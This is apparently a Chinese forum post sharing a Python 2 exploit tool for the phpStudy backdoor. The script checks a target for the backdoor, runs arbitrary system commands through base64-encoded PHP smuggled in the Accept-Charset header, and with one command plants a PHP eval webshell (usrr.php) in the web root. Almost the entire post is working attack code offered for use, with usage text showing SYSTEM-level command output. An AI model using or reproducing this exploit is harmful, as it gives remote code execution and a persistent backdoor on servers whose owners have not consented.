phpstudy后门检测及利用工具,可检测漏洞,直接执行系统命令,一键getshell(默认一句话,可更改源码中的webshell未为自己的即可,webshell默认在网站根目录下)。直接python运行脚本会打印用法。
# -*- coding: utf-8 -*-
# @Author: caixukun
import requests
import base64
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
webshell = r'''
<?php @eval($_POST['cmd']); ?>
'''
if len(sys.argv)==3:
url = sys.argv[1]
s = sys.argv[2]
if s =='getshell':
s1 = "echo $_SERVER['DOCUMENT_ROOT'];"
s2 = "echo 'fuck';"+s1+"echo 'fuck';"
cmd = base64.b64encode(s2)
sess = requests.Session()
sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
r = sess.get(url,verify=False,timeout=5)
huixian = re.findall("fuck(.*?)fuck",r.content,re.S)
for x in huixian:
lujing = x
s2 = "fwrite(fopen('"+lujing+"/usrr.php', 'w'),"+"'"+webshell+"');";
s2 = "echo 'fuck';"+s2+"echo 'fuck';"
cmd = base64.b64encode(s2.encode('utf-8'))
sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
r = sess.get(url,verify=False,timeout=5)
print "-------------------getshell-------------------"
print "webshell:"+url+"/usrr.php"
else:
s = base64.b64encode(s)
s1 = "exec(base64_decode('"+s+"'));"
sess = requests.Session()
s2 = "echo 'fuck';"+s1+"echo 'fuck';"
cmd = base64.b64encode(s2.encode('utf-8'))
sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
try:
r = sess.get(url,verify=False,timeout=5)
huixian = re.findall("fuck(.*?)fuck",r.content,re.S)
for x in huixian:
print x
except Exception,e:
print '连接超时,请检查你的ur地址'.decode('utf-8')
elif len(sys.argv)==2:
url = sys.argv[1]
sess = requests.Session()
s = "echo 'fuck phpstudy';"
cmd = base64.b64encode(s)
sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
try:
r = sess.get(url,verify=False,timeout=5)
if 'fuck phpstudy' in r.content:
print '存在phpstydy后门!!!---Do it'.decode('utf-8')
else:
print "没有后门或者输入网站其它php文件".decode('utf-8')
except Exception,e:
print '连接超时,请检查你的ur地址'.decode('utf-8')
else:
print "------------------------Author: caixukun-------------------------"
print "phpstudy后门检测工具及利用工具终极版".decode('utf-8')
print "------------------------check-----------------------------------"
print "python phpstudy_rce.py http://127.0.0.1"
print "存在phpstydy后门!!!---Do it".decode('utf-8')
print "-------------------------exploit--------------------------------"
print "python phpstudy_rce.py http://127.0.0.1 whoami"
print "nt authority\system"
print "-------------------------getshell--------------------------------"
print "python phpstudy_rce.py http://127.0.0.1 getshell"
print "webshell:http://127.0.0.1/usrr.php 支持自定义webshell,更改源码webshell为自己的即可".decode('utf-8')
- 通过
- 未通过
0 投票者